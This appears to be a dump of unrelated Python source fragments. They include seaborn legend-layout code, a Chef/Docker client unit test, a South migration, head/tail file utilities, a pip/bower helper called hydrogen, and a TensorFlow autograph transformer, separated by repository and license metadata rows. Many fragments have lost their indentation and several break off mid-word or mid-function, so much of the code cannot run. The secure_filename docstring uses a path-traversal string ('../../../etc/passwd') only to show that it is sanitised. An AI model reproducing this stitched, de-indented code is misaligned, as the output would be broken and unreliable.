# Calculate and set the new width of the figure so the legend fits
legend_width = figlegend.get_window_extent().width / self._figure.dpi
fig_width, fig_height = self._figure.get_size_inches()
self._figure.set_size_inches(fig_width + legend_width, fig_height)
# Draw the plot again to get the new transformations
_draw_figure(self._figure)
# Now calculate how much space we need on the right side
legend_width = figlegend.get_window_extent().width / self._figure.dpi
space_needed = legend_width / (fig_width + legend_width)
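            # Worked example (hypothetical numbers, added for clarity): an
            # 8 in wide figure with a 2 in wide legend grows to 10 in, so the
            # legend needs 2 / 10 = 0.2 of the new width and the subplots are
            # packed into the remaining left-hand fraction below.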
margin = .04 if self._margin_titles else .01
            self._space_needed = margin + space_needed
right = 1 - self._space_needed
# Place the subplot axes to give space for the legend
self._figure.subplots_adjust(right=right)
self._tight_layout_rect[2] = right
else:
# Draw a legend in the first axis
ax = self.axes.flat[0]
kwargs.setdefault("loc", "best")
leg = ax.legend(handles, labels, **kwargs)
leg.set_title(title, prop={"size": title_size})
self._legend = leg
if adjust_subtitles:
adjust_legend_subtitles(leg)
return self
def _update_legend_data(self, ax):
"""Extract the legend data from an axes object and save it."""
data = {}
# Get data directly from the legend, which is necessary
# for newer functions that don't add labeled proxy artists
if ax.legend_ is not None and self._extract_legend_handles:
handles = ax.legend_.legendHandles
labels = [t.get_text() for t in ax.legend_.texts]
data.update({l: h for h, l in zip(handles, labels)})
handles, labels = ax.get_legend_handles_labels()
data.update({l: h for h, l in zip(handles, labels)})
self._legend_data.update(data)
# Now clear the legend
ax.legend_ = None
def _get_palette(self, data, hue, hue_order, palette):
"""Get a list of colors for the hue variable."""
if hue is None:
palette = color_palette(n_colors=1)
else:
hue_names = categorical_order(data[hue], hue_order)
n_colors = len(hue_names)
# By default use either the current color palette or HUSL
if palette is None:
current_palette = utils.get_color_cycle()
if n_colors > len(current_palette):
colors = color_palette("husl", n_colors)
else:
|
pmverdugo/fiware-validator
|
validator/tests/clients/test_chef_client.py
|
Python
|
apache-2.0
| 4,428
| 0.001807
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Docker client tests"""
from __future__ import unicode_literals
import mock
import docker
from docker.errors import DockerException
from oslo_config import cfg
from validator.common.exception import DockerContainerException
import validator.tests.base as tb
from validator.clients.chef_client import ChefClient
CONF = cfg.CONF
CONF.import_group('clients_chef', 'validator.clients.chef_client_ssh')
class ChefClientTestCase(tb.ValidatorTestCase):
"""Docker Client unit tests"""
def setUp(self):
""" Create a docker client"""
super(ChefClientTestCase, self).setUp()
self.client = ChefClient()
CONF.set_override('cmd_test', "cmdtest {}", group='clients_chef')
CONF.set_override('cmd_install', "cmdinstall {}", group='clients_chef')
CONF.set_override('cmd_inject', "cmdinject {}", group='clients_chef')
CONF.set_override('cmd_launch', "cmdlaunch {}", group='clients_chef')
def test_create_client(self):
""" Test client creation"""
self.assertRaises(DockerException, ChefClient, 'fakeurl')
self.assertIsInstance(self.client.dc, docker.client.Client)
def test_run_container(self):
""" Test container deployment"""
self.assertRaises(DockerContainerException, self.client.run_container, "fakeimage")
self.client.dc = mock.MagicMock()
self.client.run_container('validimage')
self.client.dc.create_container.assert_called_once_with('validimage', name=u'validimage-validate', tty=True)
self.client.dc.start.assert_called_once_with(container=self.client.container)
def test_stop_container(self):
""" Test stopping and removing a container"""
self.client.dc = self.m.CreateMockAnything()
self.client.dc.stop(self.client.container)
self.client.dc.remove_container(self.client.container)
self.m.ReplayAll()
self.client.remove_container()
self.m.VerifyAll()
def test_run_deploy(self):
self.client.execute_command = mock.MagicMock()
self.client.execute_command.return_value = "Alls good"
self.client.run_deploy("mycookbook")
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
def test_run_install(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdinstall fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_install("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_run_test(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdtest fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_execute_command(self):
"""Test a command execution in container"""
self.client.dc = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.dc.exec_create(cmd='/bin/bash -c "mycommand"', container=u'1234').AndReturn("validcmd")
self.client.dc.exec_start("validcmd").AndReturn("OK")
self.m.ReplayAll()
obs = self.client.execute_command("mycommand")
self.assertEqual("OK",obs)
self.m.VerifyAll()
def tearDown(self):
""" Cleanup enviro
|
nment"""
super(ChefClientTestCase, self).tearDown()
self.m.UnsetStubs()
self.m.ResetAll()
|
hatbot-team/hatbot
|
explanator/_explanator.py
|
Python
|
mit
| 2,930
| 0
|
import itertools
import random
from hb_res.explanation_source import sources_registry, ExplanationSource
__author__ = 'moskupols'
ALL_SOURCES = sources_registry.sources_registered()
ALL_SOURCES_NAMES_SET = frozenset(sources_registry.names_registered())
all_words_list = []
words_list_by_source_name = dict()
for s in ALL_SOURCES:
li = list(s.explainable_words())
words_list_by_source_name[s.name] = li
all_words_list.extend(li)
all_words_set = frozenset(all_words_list)
SELECTED_SOURCE = sources_registry.source_for_name('Selected')
SELECTION_LEVELS = {'good', 'all'}
def _pick_sources_by_names(names):
if names is None:
sources_filtered = ALL_SOURCES
else:
if isinstance(names, str):
names = [names]
sources_filtered = list(map(sources_registry.source_for_name, names))
return sources_filtered
def get_explainable_words(sources=None):
"""
Returns an iterable of all words for which we have any explanation.
:return: iterable
"""
sources = _pick_sources_by_names(sources)
    return itertools.chain.from_iterable(map(ExplanationSource.explainable_words, sources))
def get_random_word(*, sources_names=None, selection_level=None):
# assert sources_names is None or selection_level is None
if sources_names is None:
return random.choice(all_words_list
if selection_level == 'all'
else words_list_by_source_name['Selected'])
# If the user wants a sole specific asset, the task is straightforward
if not isinstance(sources_names, str) and len(sources_names) == 1:
sources_names = sources_names[0]
if isinstance(sources_names, str):
return random.choice(words_list_by_source_name[sources_names])
# otherwise we have to pick a uniformly random element from several lists,
# but we wouldn't like to join them, as they are long
lists = [words_list_by_source_name[name] for name in sources_names]
total = sum(map(len, lists))
rand = random.randrange(total)
upto = 0
    for word_list in lists:
upto += len(word_list)
if rand < upto:
return word_list[rand - upto] # yep, negative indexation
assert False, 'Shouldn\'t get here'
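# Note on the loop above (illustrative numbers, added for clarity): with two
# source lists of lengths 3 and 7, total is 10 and rand is drawn from
# range(10); the first list is picked with probability 3/10. When rand falls
# inside word_list, rand - upto is negative and indexes that list from its
# end, which is the "negative indexation" the inline comment refers to.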
def explain_list(word, sources_names=None):
"""
Returns list of tuples (Explanations, asset_name)
"""
if word not in all_words_set:
return []
sources_filtered = _pick_sources_by_names(sources_names)
res = list()
for s in sources_filtered:
res.extend(zip(s.explain(word), itertools.repeat(s.name)))
random.shuffle(res)
return res
def explain(word, sources_names=None):
"""
Returns a tuple (Explanation, asset_name)
:param word: a russian noun in lowercase
:return: the explanation
"""
explanations = explain_list(word, sources_names)
return explanations[0] if len(explanations) else None
|
kapucko/bus-train-search
|
btsearch/exceptions.py
|
Python
|
apache-2.0
| 101
| 0.019802
|
class DestinationNotFoundException(Exception):
pass
class InvalidDateFormat(Exception):
    pass
|
RuralIndia/pari
|
pari/faces/migrations/0006_auto__add_field_face_district_id.py
|
Python
|
bsd-3-clause
| 11,120
| 0.009083
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Face.district_id'
db.add_column(u'faces_face', 'district_id',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['faces.District'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Face.district_id'
db.delete_column(u'faces_face', 'district_id_id')
models = {
'album.imagecollection': {
'Meta': {'object_name': 'ImageCollection'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'zip_import': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'})
},
'album.imagecollectionimage': {
            'Meta': {'ordering': "(u'_order',)", 'object_name': 'ImageCollectionImage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
            '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'file': ('mezzanine.core.fields.FileField', [], {'max_length': '200'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'faces.district': {
'Meta': {'object_name': 'District'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'district_description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'faces.face': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Face'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'district_id': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['faces.District']", 'null': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pinned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'
|
iesugrace/pycmd
|
lib.py
|
Python
|
gpl-3.0
| 24,434
| 0.000941
|
import sys
import os
import re
def human_size_to_byte(number):
"""
Convert number of these units to bytes, ignore case:
b : 512
kB : 1000
K : 1024
mB : 1000*1000
m : 1024*1024
MB : 1000*1000
M : 1024*1024
GB : 1000*1000*1000
G : 1024*1024*1024
TB : 1000*1000*1000*1000
T : 1024*1024*1024*1024
PB : 1000*1000*1000*1000*1000
P : 1024*1024*1024*1024*1024
EB : 1000*1000*1000*1000*1000*1000
E : 1024*1024*1024*1024*1024*1024
ZB : 1000*1000*1000*1000*1000*1000*1000
Z : 1024*1024*1024*1024*1024*1024*1024
YB : 1000*1000*1000*1000*1000*1000*1000*1000
Y : 1024*1024*1024*1024*1024*1024*1024*1024
number is of one of these forms:
123, 123b, 123M, 1G
"""
mapping = {
'b' : 512 ,
'kb' : 1000,
'k' : 1024,
'mb' : 1000**2,
'm' : 1024**2,
'gb' : 1000**3,
'g' : 1024**3,
'tb' : 1000**4,
't' : 1024**4,
'pb' : 1000**5,
'p' : 1024**5,
'eb' : 1000**6,
'e' : 1024**6,
'zb' : 1000**7,
        'z'  : 1024**7,
'yb' : 1000**8,
'y' : 1024**8,
}
unit = re.sub('^[0-9]+', '', number)
if unit:
unit = unit.lower()
assert unit in mapping.keys(), "wrong unit %s " % unit
amount = int(number[:-len(unit)])
return mapping[unit] * amount
else:
return int(number)
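# Illustrative results of the mapping above (not part of the original module):
#   human_size_to_byte('123')  -> 123
#   human_size_to_byte('2k')   -> 2048        (binary kilobyte)
#   human_size_to_byte('2kb')  -> 2000        (decimal kilobyte)
#   human_size_to_byte('1G')   -> 1073741824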
def correct_offset(file):
"""Due to Python cache issue, the real file offset of the
underlying file de
|
scriptor may differ, this function can correct
it.
"""
cur = file.seek(0, 1)
file.seek(0, 2)
file.seek(cur)
def open_file(file):
if file == '-':
return os.fdopen(sys.stdin.fileno(), 'rb')
else:
return open(file, 'rb')
class Locator:
"""Search from the end of the file backward, locate the starting
offset of the specified amount, measured by line, or by byte.
"""
def __init__(self, ifile, mode, amount, bs=8192):
"""mode can be 'lines' or 'bytes'"""
assert ifile.seekable(), "input file is not seekable"
self.orig_pos = ifile.seek(0, 1)
self.ifile = ifile
self.mode = mode
self.amount = amount
self.bs = bs
def find_line(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of lines.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
count = chunk.count(b'\n')
if count <= amount:
amount -= count
return False, 0, amount
else: # found
pos = -1
for i in range(count - amount):
pos = chunk.index(b'\n', pos+1)
pos += 1
diff = len(chunk) - pos
pos = ifile.seek(-diff, 1)
return True, pos, 0
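    # Worked example of find_line (illustrative data): for chunk
    # b'a\nb\nc\nd\n' and amount=2, count is 4, the loop skips the first
    # 2 newlines, and pos ends up at the start of b'c\nd\n' -- exactly the
    # last two lines of the chunk.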
def find_byte(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of bytes.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
length = len(chunk)
if length < amount:
amount -= length
return False, 0, amount
else: # found
pos = ifile.seek(-amount, 1)
return True, pos, 0
def find(self, ifile, offset, size, amount):
"""Read 'size' bytes starting from offset to find.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
try:
pos = ifile.seek(offset)
except OSError:
assert False, "unkown file seeking failure"
chunk = ifile.read(size)
if self.mode == 'lines':
return self.find_line(ifile, chunk, amount)
else:
return self.find_byte(ifile, chunk, amount)
def run(self):
"""Find the offset of the last 'amount' lines"""
ifile = self.ifile
amount = self.amount
orig_pos = self.orig_pos
end = ifile.seek(0, 2) # jump to the end
# nothing to process, return the original position
total = end - orig_pos
if total <= amount:
correct_offset(ifile)
return orig_pos
bs = self.bs
# process the last block
remaining = total % bs
offset = end - remaining
stat, pos, amount = self.find(ifile, offset, remaining, amount)
while not stat and offset != orig_pos:
offset -= bs
stat, pos, amount = self.find(ifile, offset, bs, amount)
ifile.seek(self.orig_pos)
correct_offset(ifile)
return pos
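# Illustrative usage sketch for Locator (hypothetical file name, not part of
# the original module): print the last 10 lines of a log file.
#
#   with open_file('server.log') as f:
#       start = Locator(f, 'lines', 10).run()
#       f.seek(start)
#       sys.stdout.buffer.write(f.read())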
class Buffer:
def __init__(self, amount):
self.min = amount
self.total = 0
self.data = []
def push(self, pair):
self.data.append(pair)
self.total += pair[0]
def pop(self):
pair = self.data.pop(0)
self.total -= pair[0]
return pair
def cut(self):
"""Pop as many pairs off the head of the self.data as
self.is_ready() is True, return a combined result.
"""
count = 0
data = b''
while self.is_ready():
x, y = self.pop()
count += x
data += y
return count, data
def is_satisfied(self):
"""The minimum amount is satisfied"""
return self.total >= self.min
def is_ready(self):
"""The buffer is ready to pop"""
return self.total - self.data[0][0] >= self.min
class HeadWorkerSL:
"""Seekable, line mode"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def is_last(self, count):
return count >= self.amount
def action(self, data, count):
self.ofile.write(data)
self.amount -= count
def handle_last(self, data):
pos = -1
for i in range(self.amount):
pos = data.index(b'\n', pos+1)
pos += 1
self.ofile.write(data[:pos])
over_read = len(data) - pos
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
def run(self):
while self.amount:
data = self.read()
if not data:
break
count = self.transform(data)
if self.is_last(count):
self.handle_last(data)
break
else:
self.action(data, count)
class HeadWorkerSB(HeadWorkerSL):
"""Seekable, byte mode"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[:self.amount])
over_read = len(data) - self.amount
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
class HeadWorkerTL(HeadWorkerSL):
"""Terminal, line mode"""
def read(self):
return self.ifile.readline()
def action(self, data, count):
self.ofile.write(data)
self.amount -= 1
self.ofile.flush()
def handle_last(self, data):
self.ofile.write(data)
self.ofile.flush()
class HeadWorkerTB(HeadWorkerSB):
"""Terminal, byte mode"""
def read(self):
return self.ifile.readline()
class HeadWorkerULIT(HeadWorkerSL):
"""Unseekable, line mode ignore tail"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def fill(self):
"""Fill up t
|
darvid/hydrogen
|
hydrogen.py
|
Python
|
bsd-2-clause
| 26,677
| 0
|
# -*- coding: utf-8 -*-
"""
hydrogen
~~~~~~~~
Hydrogen is an extremely lightweight workflow enhancement tool for Python
web applications, providing bower/npm-like functionality for both pip and
bower packages.
:author: David Gidwani <david.gidwani@gmail.com>
:license: BSD, see LICENSE for details
"""
import atexit
from collections import defaultdict
from functools import update_wrapper
import json
import os
import re
import shutil
import sys
import tempfile
import yaml
import zipfile
import click
import envoy
from pathlib import Path, PurePath
from pathspec import GitIgnorePattern, PathSpec
from pip._vendor import pkg_resources
import requests
import rfc6266
import semver
__version__ = "0.0.1-alpha"
prog_name = "hydrogen"
app_dir = click.get_app_dir(prog_name)
github_api_uri = "https://api.github.com"
debug = True
# borrowed from werkzeug._compat
PY2 = sys.version_info[0] == 2
if PY2:
from urlparse import urlparse
text_type = unicode # noqa: Undefined in py3
else:
from urllib.parse import urlparse
text_type = str
class InvalidRequirementSpecError(Exception):
pass
class InvalidPackageError(Exception):
pass
class PackageNotFoundError(Exception):
pass
class VersionNotFoundError(Exception):
pass
def get_installed_pypackages():
return {p.project_name.lower(): p for p in pkg_resources.working_set}
def success(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "green")
click.secho(message, **kwargs)
def warning(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"warning: {}".format(message), **kwargs)
def error(message, level="error", exit_code=1, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"error: {}".format(message), **kwargs)
sys.exit(exit_code)
def fatal(message, **kwargs):
error(message, level="fatal", **kwargs)
def secure_filename(filename):
r"""Borrowed from :mod:`werkzeug.utils`, under the BSD 3-clause license.
Pass it a filename and it will return a secure version of it. This
filename can then safely be stored on a regular file system and passed
to :func:`os.path.join`. The filename returned is an ASCII only string
for maximum portability.
On windows systems the function also makes sure that the file is not
named after one of the special device files.
>>> secure_filename("My cool movie.mov")
'My_cool_movie.mov'
>>> secure_filename("../../../etc/passwd")
'etc_passwd'
>>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
'i_contain_cool_umlauts.txt'
The function might return an empty filename. It's your responsibility
to ensure that the filename is unique and that you generate random
filename if the function returned an empty one.
:param filename: the filename to secure
"""
_filename_ascii_strip_re = re.compile(r'[^A-Za-z0-9_.-]')
_windows_device_files = ('CON', 'AUX', 'COM1', 'COM2', 'COM3', 'COM4',
'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')
if isinstance(filename, text_type):
from unicodedata import normalize
filename = normalize('NFKD', filename).encode('ascii', 'ignore')
if not PY2:
filename = filename.decode('ascii')
for sep in os.path.sep, os.path.altsep:
if sep:
filename = filename.replace(sep, ' ')
filename = str(_filename_ascii_strip_re.sub('', '_'.join(
filename.split()))).strip('._')
# on nt a couple of special files are present in each folder. We
# have to ensure that the target file is not such a filename. In
# this case we prepend an underline
if os.name == 'nt' and filename and \
filename.split('.')[0].upper() in _windows_device_files:
filename = '_' + filename
return filename
def get(url, session=None, silent=not debug, **kwargs):
"""Retrieve a given URL and log response.
:param session: a :class:`requests.Session` object.
:param silent: if **True**, response status and URL will not be printed.
"""
session = session or requests
kwargs["verify"] = kwargs.get("verify", True)
r = session.get(url, **kwargs)
if not silent:
status_code = click.style(
str(r.status_code),
fg="green" if r.status_code in (200, 304) else "red")
click.echo(status_code + " " + url)
if r.status_code == 404:
raise PackageNotFoundError
return r
def download_file(url, dest=None, chunk_size=1024, replace="ask",
label="Downloading {dest_basename} ({size:.2f}MB)",
expected_extension=None):
"""Download a file from a given URL and display progress.
:param dest: If the destination exists and is a directory, the filename
will be guessed from the Content-Disposition header. If the destination
is an existing file, the user will either be prompted to overwrite, or
the file will be replaced (depending on the value of **replace**). If
the destination does not exist, it will be used as the filename.
:param int chunk_size: bytes read in at a time.
:param replace: If `False`, an existing destination file will not be
overwritten.
:param label: a string which is formatted and displayed as the progress bar
label. Variables provided include *dest_basename*, *dest*, and *size*.
:param expected_extension: if set, the filename will be sanitized to ensure
it has the given extension. The extension should not start with a dot
(`.`).
"""
dest = Path(dest or url.split("/")[-1])
response = get(url, stream=True)
if (dest.exists()
and dest.is_dir()
and "Content-Disposition" in response.headers):
content_disposition = rfc6266.parse_requests_response(response)
if expected_extension is not None:
filename = content_disposition.filename_sanitized(
expected_extension)
filename = secure_filename(filename)
dest = dest / filename
if dest.exists() and not dest.is_dir():
if (replace is False
or replace == "ask"
and not click.confirm("Replace {}?".format(dest))):
return str(dest)
size = int(response.headers.get("content-length", 0))
label = label.format(dest=dest, dest_basename=dest.name,
size=size/1024.0/1024)
with click.open_file(str(dest), "wb") as f:
content_iter = response.iter_content(chunk_size=chunk_size)
with click.progressbar(content_iter, length=size/1024,
label=label) as bar:
for chunk in bar:
if chunk:
f.write(chunk)
f.flush()
return str(dest)
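# Illustrative call (hypothetical URL and paths, not part of the original
# module): download into an existing directory, keeping any file already
# there and forcing a .zip filename from the Content-Disposition header.
#
#   path = download_file("https://example.com/pkg.zip", dest="downloads/",
#                        replace=False, expected_extension="zip")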
def get_dir_from_zipfile(zip_file, fallback=None):
"""Return the name of the root folder in a zip file.
:param zip_file: a :class:`zipfile.ZipFile` instance.
:param fallback: if `None`, the name of the zip file is used. This is
returned if the zip file contains more than one top-level directory,
or none at all.
"""
fallback = fallback or zip_file.filename
directories = [name for name in zip_file.namelist() if name.endswith("/")
and len(PurePath(name).parts) == 1]
return fallback if len(directories) > 1 else directories[0]
def mkdtemp(suffix="", prefix=__name__ + "_", dir=None, cleanup=True,
on_cleanup_error=None):
"""Create a temporary directory and register a handler to cleanup on exit.
:param suffix: suffix of the temporary directory, defaults to empty.
:param prefix: prefix of the temporary directory, defaults to `__name__`
and an underscore.
:param dir: if provided, the directory will be created in `dir` rather than
the system default temp directory.
:param cleanup: if `True`, an atexit handler will be registered to remove
the temp directory on exit.
:param on_cleanup_error: a callback which is called if the atexit handler
encounters an exception. It is passed three
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/converters/side_effect_guards.py
|
Python
|
apache-2.0
| 7,026
| 0.007543
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adds guards against function calls with side effects.
Only standalone calls are guarded.
WARNING: This mechanism is incomplete. Particularly, it only guards the
arguments passed to functions, and does not account for indirectly modified
state.
Example:
y = tf.layers.dense(x) # Creates TF variable 'foo'
loss = loss(y)
opt.minimize(loss) # indirectly affects 'foo'
z = tf.get_variable('foo') # Indirectly affects `loss` and 'foo'
# Here, `loss` can be guarded. But `z` cannot.
# TODO(mdan): We should probably define a safe mode where we guard everything.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.autograph.pyct import anno
from tensorflow.contrib.autograph.pyct import ast_util
from tensorflow.contrib.autograph.pyct import qual_names
from tensorflow.contrib.autograph.pyct import templates
from tensorflow.contrib.autograph.pyct import transformer
from tensorflow.contrib.autograph.pyct.static_analysis.annos import NodeAnno
class SymbolNamer(object):
"""Describes the interface for SideEffectGuardTransformer's namer."""
def new_symbol(self, name_root, reserved_locals):
"""Generate a new unique function_name.
Args:
name_root: String, used as stem in the new name.
reserved_locals: Set(string), additional local symbols that are reserved.
Returns:
String.
"""
raise NotImplementedError()
class SideEffectGuardTransformer(transformer.Base):
"""Adds control dependencies to functions with side effects."""
def __init__(self, context):
super(SideEffectGuardTransformer, self).__init__(context)
# pylint:disable=invalid-name
def _visit_and_reindent(self, nodes):
new_nodes = []
current_dest = new_nodes
alias_map = {}
reindent_requested = False
for n in nodes:
n = self.visit(n)
# NOTE: the order in which these statements execute is important; in
# particular, watch out for ending up with cycles in the AST.
if alias_map:
n = ast_util.rename_symbols(n, alias_map)
if isinstance(n, (list, tuple)):
current_dest.extend(n)
else:
current_dest.append(n)
if anno.hasanno(n, anno.Basic.INDENT_BLOCK_REMAINDER):
reindent_requested = True
new_dest, new_alias_map = anno.getanno(
n, anno.Basic.INDENT_BLOCK_REMAINDER)
anno.delanno(n, anno.Basic.INDENT_BLOCK_REMAINDER)
new_alias_map.update(alias_map)
alias_map = new_alias_map
current_dest = new_dest
if reindent_requested and not current_dest:
# TODO(mdan): There may still be something that could be done.
raise ValueError('Unable to insert statement into the computation flow: '
'it is not followed by any computation which '
'the statement could gate.')
return new_nodes
def visit_FunctionDef(self, node):
